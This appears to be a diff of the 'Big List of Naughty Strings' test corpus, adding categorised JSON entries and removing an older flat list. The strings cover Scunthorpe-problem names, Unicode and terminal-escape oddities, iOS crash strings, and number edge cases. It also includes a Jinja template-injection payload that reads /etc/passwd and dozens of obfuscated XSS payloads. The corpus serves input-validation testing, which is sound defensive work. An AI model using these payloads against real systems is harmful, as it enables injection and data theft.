+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Penistone Community Church",
+    "base64": "UGVuaXN0b25lIENvbW11bml0eSBDaHVyY2g="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Lightwater Country Park",
+    "base64": "TGlnaHR3YXRlciBDb3VudHJ5IFBhcms="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Jimmy Clitheroe",
+    "base64": "SmltbXkgQ2xpdGhlcm9l"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Horniman Museum",
+    "base64": "SG9ybmltYW4gTXVzZXVt"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "shitake mushrooms",
+    "base64": "c2hpdGFrZSBtdXNocm9vbXM="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "RomansInSussex.co.uk",
+    "base64": "Um9tYW5zSW5TdXNzZXguY28udWs="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "http://www.cum.qc.ca/",
+    "base64": "aHR0cDovL3d3dy5jdW0ucWMuY2Ev"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Craig Cockburn, Software Specialist",
+    "base64": "Q3JhaWcgQ29ja2J1cm4sIFNvZnR3YXJlIFNwZWNpYWxpc3Q="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Linda Callahan",
+    "base64": "TGluZGEgQ2FsbGFoYW4="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Dr. Herman I. Libshitz",
+    "base64": "RHIuIEhlcm1hbiBJLiBMaWJzaGl0eg=="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "magna cum laude",
+    "base64": "bWFnbmEgY3VtIGxhdWRl"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Super Bowl XXX",
+    "base64": "U3VwZXIgQm93bCBYWFg="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "medieval erection of parapets",
+    "base64": "bWVkaWV2YWwgZXJlY3Rpb24gb2YgcGFyYXBldHM="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "evaluate",
+    "base64": "ZXZhbHVhdGU="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "mocha",
+    "base64": "bW9jaGE="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "expression",
+    "base64": "ZXhwcmVzc2lvbg=="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Arsenal canal",
+    "base64": "QXJzZW5hbCBjYW5hbA=="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "classic",
+    "base64": "Y2xhc3NpYw=="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Tyson Gay",
+    "base64": "VHlzb24gR2F5"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Dick Van Dyke",
+    "base64": "RGljayBWYW4gRHlrZQ=="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "basement",
+    "base64": "YmFzZW1lbnQ="
+  },
+  {
+    "category": "Strings which may cause human to reinterpret worldview",
+    "string": "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.",
+    "base64": "SWYgeW91J3JlIHJlYWRpbmcgdGhpcywgeW91J3ZlIGJlZW4gaW4gYSBjb21hIGZvciBhbG1vc3QgMjAgeWVhcnMgbm93LiBXZSdyZSB0cnlpbmcgYSBuZXcgdGVjaG5pcXVlLiBXZSBkb24ndCBrbm93IHdoZXJlIHRoaXMgbWVzc2FnZSB3aWxsIGVuZCB1cCBpbiB5b3VyIGRyZWFtLCBidXQgd2UgaG9wZSBpdCB3b3Jrcy4gUGxlYXNlIHdha2UgdXAsIHdlIG1pc3MgeW91Lg=="
+  },
+  {
+    "category": "Strings which punish the fools who use cat/type on this file",
+    "string": "Roses are \u001b[0;31mred\u001b[0m, violets are \u001b[0;34mblue. Hope you enjoy terminal hue",
+    "base64": "Um9zZXMgYXJlIBtbMDszMW1yZWQbWzBtLCB2aW9sZXRzIGFyZSAbWzA7MzRtYmx1ZS4gSG9wZSB5b3UgZW5qb3kgdGVybWluYWwgaHVl"
+  },
+  {
+    "category": "Strings which punish the fools who use cat/type on this file",
+    "string": "But now...\u001b[20Cfor my greatest trick...\u001b[8m",
+    "base64": "QnV0IG5vdy4uLhtbMjBDZm9yIG15IGdyZWF0ZXN0IHRyaWNrLi4uG1s4bQ=="
+  },
+  {
+    "category": "Strings which punish the fools who use cat/type on this file",
+    "string": "The quic\b\b\b\b\b\bk brown fo\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007x... [Beeeep]",
+    "base64": "VGhlIHF1aWMICAgICAhrIGJyb3duIGZvBwcHBwcHBwcHBwd4Li4uIFtCZWVlZXBd"
+  },
+  {
+    "category": "Strings which crashed iMessage in various versions of iOS",
+    "string": "Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗",
+    "base64": "UG93ZXLZhNmP2YTZj9i12ZHYqNmP2YTZj9mE2LXZkdio2Y/Ysdix2Ysg4KWjIOClo2gg4KWjIOClo+WGlw=="
+  },
+  {
+    "category": "Strings which crashed iMessage in various versions of iOS",
+    "string": "🏳0🌈️",
+    "base64": "8J+PszDwn4yI77iP"
+  },
+  {
+    "category": "Strings which crashed iMessage in various versions of iOS",
+    "string": "జ్ఞ‌ా",
+    "base64": "4LCc4LGN4LCe4oCM4LC+"
+  },
+  {
+    "category": "This is a four characters string which includes Persian special characters (گچپژ)",
+    "string": "گچپژ",
+    "base64": "2q/ahtm+2pg="
+  },
+  {
+    "category": "second, obviously, prints contents of /etc/passwd",
+    "string": "{% print 'x' * 64 * 1024**3 %}",
+    "base64": "eyUgcHJpbnQgJ3gnICogNjQgKiAxMDI0KiozICV9"
+  },
+  {
+    "category": "second, obviously, prints contents of /etc/passwd",
+    "string": "{{ \"\".__class__.__mro__[2].__subclasses__()[40](\"/etc/passwd\").read() }}",
+    "base64": "e3sgIiIuX19jbGFzc19fLl9fbXJvX19bMl0uX19zdWJjbGFzc2VzX18oKVs0MF0oIi9ldGMvcGFzc3dkIikucmVhZCgpIH19"
+  }
 ]
-

--- a/blns.json
+++ b/blns.json
@@ -1,517 +1,2062 @@
 [
-  "", 
-  "undefined", 
-  "undef", 
-  "null", 
-  "NULL", 
-  "(null)", 
-  "nil", 
-  "NIL", 
-  "true", 
-  "false", 
-  "True", 
-  "False", 
-  "TRUE", 
-  "FALSE", 
-  "None", 
-  "hasOwnProperty", 
-  "then", 
-  "\\", 
-  "\\\\", 
-  "0", 
-  "1", 
-  "1.00", 
-  "$1.00", 
-  "1/2", 
-  "1E2", 
-  "1E02", 
-  "1E+02", 
-  "-1", 
-  "-1.00", 
-  "-$1.00", 
-  "-1/2", 
-  "-1E2", 
-  "-1E02", 
-  "-1E+02", 
-  "1/0", 
-  "0/0", 
-  "-2147483648/-1", 
-  "-9223372036854775808/-1", 
-  "-0", 
-  "-0.0", 
-  "+0", 
-  "+0.0", 
-  "0.00", 
-  "0..0", 
-  ".", 
-  "0.0.0", 
-  "0,00", 
-  "0,,0", 
-  ",", 
-  "0,0,0", 
-  "0.0/0", 
-  "1.0/0.0", 
-  "0.0/0.0", 
-  "1,0/0,0", 
-  "0,0/0,0", 
-  "--1", 
-  "-", 
-  "-.", 
-  "-,", 
-  "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", 
-  "NaN", 
-  "Infinity", 
-  "-Infinity", 
-  "INF", 
-  "1#INF", 
-  "-1#IND", 
-  "1#QNAN", 
-  "1#SNAN", 
-  "1#IND", 
-  "0x0", 
-  "0xffffffff", 
-  "0xffffffffffffffff", 
-  "0xabad1dea", 
-  "123456789012345678901234567890123456789", 
-  "1,000.00", 
-  "1 000.00", 
-  "1'000.00", 
-  "1,000,000.00", 
-  "1 000 000.00", 
-  "1'000'000.00", 
-  "1.000,00", 
-  "1 000,00", 
-  "1'000,00", 
-  "1.000.000,00", 
-  "1 000 000,00", 
-  "1'000'000,00", 
-  "01000", 
-  "08", 
-  "09", 
-  "2.2250738585072011e-308", 
-  ",./;'[]\\-=", 
-  "<>?:\"{}|_+", 
-  "!@#$%^&*()`~", 
-  "\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f", 
-  "", 
-  "\t\u000b\f              ​    　", 
-  "­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‪‫‬‭‮⁠⁡⁢⁣⁤⁦⁧⁨⁩⁪⁫⁬⁭⁮⁯﻿￹￺￻𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶󠁷󠁸󠁹󠁺󠁻󠁼󠁽󠁾󠁿", 
-  "﻿", 
-  "￾", 
-  "Ω≈ç√∫˜µ≤≥÷", 
-  "åß∂ƒ©˙∆˚¬…æ", 
-  "œ∑´®†¥¨ˆøπ“‘", 
-  "¡™£¢∞§¶•ªº–≠", 
-  "¸˛Ç◊ı˜Â¯˘¿", 
-  "ÅÍÎÏ˝ÓÔÒÚÆ☃", 
-  "Œ„´‰ˇÁ¨ˆØ∏”’", 
-  "`⁄€‹›ﬁﬂ‡°·‚—±", 
-  "⅛⅜⅝⅞", 
-  "ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя", 
-  "٠١٢٣٤٥٦٧٨٩", 
-  "⁰⁴⁵", 
-  "₀₁₂", 
-  "⁰⁴⁵₀₁₂", 
-  "ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็", 
-  "'", 
-  "\"", 
-  "''", 
-  "\"\"", 
-  "'\"'", 
-  "\"''''\"'\"", 
-  "\"'\"'\"''''\"", 
-  "<foo val=“bar” />", 
-  "<foo val=“bar” />", 
-  "<foo val=”bar“ />", 
-  "<foo val=`bar' />", 
-  "田中さんにあげて下さい", 
-  "パーティーへ行かないか", 
-  "和製漢語", 
-  "部落格", 
-  "사회과학원 어학연구소", 
-  "찦차를 타고 온 펲시맨과 쑛다리 똠방각하", 
-  "社會科學院語學研究所", 
-  "울란바토르", 
-  "𠜎𠜱𠝹𠱓𠱸𠲖𠳏", 
-  "𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓/𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆",
-  "表ポあA鷗ŒéＢ逍Üßªąñ丂㐀𠀀", 
-  "Ⱥ", 
-  "Ⱦ", 
-  "ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ", 
-  "(｡◕ ∀ ◕｡)", 
-  "｀ｨ(´∀｀∩", 
-  "__ﾛ(,_,*)", 
-  "・(￣∀￣)・:*:", 
-  "ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ", 
-  ",。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’", 
-  "(╯°□°）╯︵ ┻━┻)", 
-  "(ﾉಥ益ಥ）ﾉ﻿ ┻━┻", 
-  "┬─┬ノ( º _ ºノ)", 
-  "( ͡° ͜ʖ ͡°)", 
-  "¯\\_(ツ)_/¯", 
-  "😍", 
-  "👩🏽", 
-  "👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️", 
-  "👾 🙇 💁 🙅 🙆 🙋 🙎 🙍", 
-  "🐵 🙈 🙉 🙊", 
-  "❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙", 
-  "✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿", 
-  "👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦", 
-  "🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧", 
-  "0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟", 
-  "🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸", 
-  "🇺🇸🇷🇺🇸🇦🇫🇦🇲", 
-  "🇺🇸🇷🇺🇸🇦", 
-  "１２３", 
-  "١٢٣", 
-  "ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.", 
-  "בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ", 
-  "הָיְתָהtestالصفحات التّحول", 
-  "﷽", 
-  "ﷺ",
-  "مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، ", 
-  "᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜‪‪‪", 
-  "‪‪᚛                 ᚜‪",
-  "‪‪test‪", 
-  "‫test‫", 
-  " test ", 
-  "test⁠test‫", 
-  "⁦test⁧", 
-  "Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣", 
-  "̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰", 
-  "̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟", 
-  "̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕", 
-  "Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮", 
-  "˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥", 
-  "00˙Ɩ$-", 
-  "Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ", 
-  "𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠", 
-  "𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌", 
-  "𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈", 
-  "𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰", 
-  "𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘", 
-  "𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐", 
-  "⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢", 
-  "<script>alert(123)</script>", 
-  "&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;", 
-  "<img src=x onerror=alert(123) />", 
-  "<svg><script>123<1>alert(123)</script>", 
-  "\"><script>alert(123)</script>", 
-  "'><script>alert(123)</script>", 
-  "><script>alert(123)</script>", 
-  "</script><script>alert(123)</script>", 
-  "< / script >< script >alert(123)< / script >", 
-  " onfocus=JaVaSCript:alert(123) autofocus", 
-  "\" onfocus=JaVaSCript:alert(123) autofocus", 
-  "' onfocus=JaVaSCript:alert(123) autofocus", 
-  "＜script＞alert(123)＜/script＞", 
-  "<sc<script>ript>alert(123)</sc</script>ript>", 
-  "--><script>alert(123)</script>", 
-  "\";alert(123);t=\"", 
-  "';alert(123);t='", 
-  "JavaSCript:alert(123)", 
-  ";alert(123);", 
-  "src=JaVaSCript:prompt(132)", 
-  "\"><script>alert(123);</script x=\"", 
-  "'><script>alert(123);</script x='", 
-  "><script>alert(123);</script x=", 
-  "\" autofocus onkeyup=\"javascript:alert(123)", 
-  "' autofocus onkeyup='javascript:alert(123)", 
-  "<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", 
-  "<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>", 
-  "<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", 
-  "<script\\x09type=\"text/javascript\">javascript:alert(1);</script>", 
-  "<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", 
-  "<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>", 
-  "<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", 
-  "'`\"><\\x3Cscript>javascript:alert(1)</script>", 
-  "'`\"><\\x00script>javascript:alert(1)</script>", 
-  "ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", 
-  "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF", 
-  "<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
